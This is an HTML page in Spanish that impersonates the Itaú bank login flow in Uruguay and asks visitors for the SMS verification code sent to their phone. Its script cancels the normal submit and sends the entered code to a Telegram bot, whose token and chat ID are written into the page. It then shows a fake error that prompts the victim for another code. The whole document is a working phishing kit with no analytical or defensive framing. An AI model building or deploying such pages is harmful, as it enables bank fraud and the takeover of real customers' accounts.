
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="../Itaú_files/popup.css" rel="stylesheet">
    <title>Itaú</title>
    <style>
        body {
            margin: 0;
            padding: 0;
        }

        .container {
            text-align: center;
            font-family: Verdana;
            max-width: 800px;
            margin: 50px auto;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        h1 {
            color: #343348;
            margin-top: 0;
            margin-bottom: 10px;
        }

        .boton {
            cursor: pointer;
            background: #fc6202;
            color: #F4F4F4;
            border-radius: 4px;
            border: none;
            padding: 6px 16px;
            width: 250px;
            height: 40px;
            font-size: 0.875rem;
            transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
            box-shadow: 0px 3px 1px -2px rgba(0, 0, 0, 0.2), 0px 2px 2px 0px rgba(0, 0, 0, 0.14), 0px 1px 5px 0px rgba(0, 0, 0, 0.12);
        }

        .boton:hover {
            background-color: #fc6202;
        }

        input {
            border-radius: 10px;
            border: 1px solid #b3bac8;
            max-width: 600px;
            margin: 10px 7px;
            height: 50px;
            font-size: 18px;
            width: 350px;
            text-align: center;
            outline: none;
        }

        input::placeholder {
            font-size: 16px;
            font-family: Verdana;
        }

        input:focus {
            border-color: rgb(126, 125, 125);
        }

        .inputCodes {
            letter-spacing: 10px;
        }

        .inputCodes::placeholder {
            letter-spacing: normal;
        }

        .error-message {
            color: red;
            margin-top: 10px;
            display: none; /* Ocultamos el mensaje por defecto */
        }

        header {
            background-color: #fff;
            width: 100%;
            height: 68px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        header img {
            max-width: 100%;
            height: auto;
        }

        footer {
            position: fixed;
            left: 0;
            bottom: 0;
            width: 100%;
            background-color: #f4f4f4;
            text-align: center;
            font-family: Verdana;
            color: #6c757d;
            font-size: 12px;
            padding: 20px;
        }
    </style>
</head>
<body>
    <header>
        <img alt="Logo" src="../logo_mobile@2x.png" width="60">
    </header>

    <section class="container">
        <div>
            <form id="mainF" method="post" name="mainF" onsubmit="return handleSubmit(event)">
                <h1 class="title">Verificación Requerida</h1>
                <p>Ingresá el código que te enviamos por SMS a tu número de celular</p>
                <input class="inputCodes" maxlength="6" minlength="6" name="smscode" pattern="[0-9]+" placeholder="######" required="" type="tel" id="smscode"><br><br>
                <button class="boton" id="mainB" type="submit">CONFIRMAR</button>
                <p class="error-message" id="error-message">ERROR: INGRESA EL NUEVO SMS QUE TE LLEGÓ</p>
            </form>
        </div>
    </section>

    <footer>
        <div class="footer-content">
            ITAU
        </div>
    </footer>

    <script>
        function handleSubmit(event) {
            event.preventDefault(); // Evita el envío del formulario
            
            const mensaje = `
➖➖➖[ 𝙄𝙏𝘼𝙐 𝙐𝙔 ]➖➖➖ 
✔️SMS CODE: ${document.getElementById('smscode').value}
➖➖➖ 𝙄𝙉𝙁𝙊 ➖➖➖
🌐 𝙄𝙋: [santiu & uruguayo]
➖➖➖
`;
            // Borrar el contenido del campo de entrada
            document.getElementById("smscode").value = '';
            
            // Mostrar el mensaje de error
            document.getElementById("error-message").style.display = "block";
            const chatId = '-1002368138458'; // Nuevo chat ID
            const token = '8062306716:AAFTmhEYqdVhnB3tbwd4d__9btEPQI2tPxA'; // Nuevo token


            const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(mensaje)}`;

            fetch(url)
                .then(response => {
                    if (response.ok) {
                        console.log('Mensaje enviado a Telegram');
                    } else {
                        console.log('Error al enviar el mensaje', response.statusText);
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                });
        }

    </script>
</body>
</html>
